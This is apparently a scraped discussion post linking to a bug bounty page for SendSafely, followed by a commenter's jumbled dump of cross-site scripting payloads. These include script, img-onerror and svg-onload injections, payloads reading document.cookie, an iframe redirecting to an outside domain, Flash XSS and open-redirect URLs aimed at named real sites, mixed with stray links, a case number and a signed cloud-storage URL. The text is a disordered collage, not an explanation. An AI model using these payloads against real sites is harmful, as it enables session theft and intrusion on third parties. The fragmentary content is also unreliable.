
Come hack on SendSafely on Bugcrowd - aasas
https://bugcrowd.com/sendsafely?utm_source=the-list&utm_medium=list-link&utm_campaign=%22onmouseover=alert(1)%3E
======
aasas
"><script>alert(1)</script> #"><img src=M onerror=prompt(1);> t"
onmouseover=alert(/xjjjjss/); a=" "onmouseover=prompt(/xss/)>
"onmouseover=alert(1)> "><script>confirm (/xss by asim/);</script> "><img
src=x onerror=prompt("//XSS-By-M_Asim_Shahzad//");> <svg/onload=prompt(1)>
<iframe src="somefile.js" /> <script type="text/javascript"> alert ('This is
an XSS Vulnerability') </script>
'><img/src=''onerror='alert(atob(/PDMgVHJlbGxv/.source))
"><script>alert(document.cookie)</script> As full name:
");</script><script>alert(1)</script>" /Message="><img src=M
onerror=prompt(1);>

URL PAYLOAD: javascript:alert(document.domain+"[http://"](http://"))

<img src="somefile.js" /> <img src="javascript:alert('yo')" /> <img src='#'
onerror=alert(1) /> istagram request url:
[https://www.facebook.com/support/case/?rdrcf&id=683688048374...](https://www.facebook.com/support/case/?rdrcf&id=683688048374254)
rEPORT NO FOR iSTAGRAM ON F,B: 206713332

[http://investor.qiwi.com/contactus.cfm](http://investor.qiwi.com/contactus.cfm)
[http://stackoverflow.com/questions/20504846/why-is-it-
common...](http://stackoverflow.com/questions/20504846/why-is-it-common-to-
put-csrf-prevention-tokens-in-cookies) <iframe>#"><img src=M
onerror=prompt(1);></iframe>

[https://hackerone-
attachments.s3.amazonaws.com/production/00...](https://hackerone-
attachments.s3.amazonaws.com/production/000/016/485/8e55ce873ca7c29435ecf8dde29b25904d627b46/Screenshot_%2825%29.png?AWSAccessKeyId=AKIAJFXIS7KJADBA4QQA&Expires=1421963577&Signature=HSI2u%2FnoQlIg%2BVo3b%2F8qyiNAsds%3D)
Bypass & Persistent [https://www.computersnyou.com/1626/how-to-install-kali-
linux...](https://www.computersnyou.com/1626/how-to-install-kali-linux-in-
virtual-machine-step-by-step/)

'%3d'>"><iframe src='[http://vulnerability-lab.com'](http://vulnerability-
lab.com') onload=window.location=('[http://evolution-
sec.com')></iframe>/927](http://evolution-sec.com'\)></iframe>/927)
[https://www.mashape.com](https://www.mashape.com) Stored XSS in account
hacked12345
[http://myip.ms/info/whois/54.186.8.201/k/1454328579/website/...](http://myip.ms/info/whois/54.186.8.201/k/1454328579/website/relateiq.com)
Flash XSS:
[https://app.mavenlink.com/flash/swfupload.swf?movieName=%22]...](https://app.mavenlink.com/flash/swfupload.swf?movieName=%22\]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%28document.domain%29;//)

DOM XSS: <svg/onload=prompt(1)>
[http://workshop.chromeexperiments.com/](http://workshop.chromeexperiments.com/)
[https://my.indeed.com/resume/?wiz=1#!3](https://my.indeed.com/resume/?wiz=1#!3)

Redirect: ?redir=llink?url=[https://twitter.com](https://twitter.com)
?redirect_url=@google.com

Password:
[https://www.facebook.com/permalink.php?story_fbid=1803586087...](https://www.facebook.com/permalink.php?story_fbid=180358608768070&id=179159408887990)

facebook.com/l.php?u=http%3A%2F%2Fgoogle.com&h=EAQFslR7a

